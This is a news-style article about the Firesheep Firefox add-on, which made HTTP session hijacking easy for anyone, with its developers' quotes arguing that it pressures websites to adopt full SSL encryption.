HTTP session hijacking as a possibility and tools to execute it have been around for more than half a decade, but it took an easy-to-use Firefox add-on like Firesheep to point out “the elephant in the room” – the lack of full-end encryption on popular sites such as Facebook, Twitter, Yahoo, Bing, and many others.
“Sniffing out” unencrypted HTTP sessions on a network segment, hijacking them and impersonating the user has suddenly become possible for everyone – even for those who know next to nothing about the underlying technology or are the most low-level users.
Four days after Firesheep has been made available, over 400,000 users have downloaded it and satisfied their curiosity. Some of them have probably used it for more than that – who knows how many unethical and illegal things were done with the information that was accessed through its use? But that is beside the point, because things like that happened before Firesheep – the only difference was that one had to be moderately tech-savy to do it.
“Websites have a responsibility to protect the people who depend on their services. They’ve been ignoring this responsibility for too long, and it’s time for everyone to demand a more secure web. My hope is that Firesheep will help the users win,” says Eric Butler, one of the developers of the add-on.
“The real story here is not the success of Firesheep but the fact that something like it is even possible, says Ian Gallagher, Butler’s co-presenter of Firesheep at Toorcon. “The same can be said for the recent news that Google Street View vehicles were collecting web traffic. It should not be possible for Google or anybody to collect this data, whether intentional or not. Going forward the metric of Firesheep’s success will quickly change from amount of attention it gains, to the number of sites that adopt proper security. True success will be when Firesheep no longer works at all.”
Both of them might just see their wish fulfilled. According to a NetworkWorld blogger, Microsoft is looking into implementing SSL in future release of Bing. And I’m betting that other companies and online services are looking into it.
As stated before HTTP session hijacking is not a new thing, and many tools that make it possible have surfaced over the years. “Firesheep is doing the exact same thing as these other tools, but with a simpler user interface,” says Gallagher. “Because of its simplicity, Firesheep has already succeeded in demonstrating the risks of insecure websites to a much wider audience than any previous tool, in a single day.”
And that, my friends, is the real value of this controversial extension.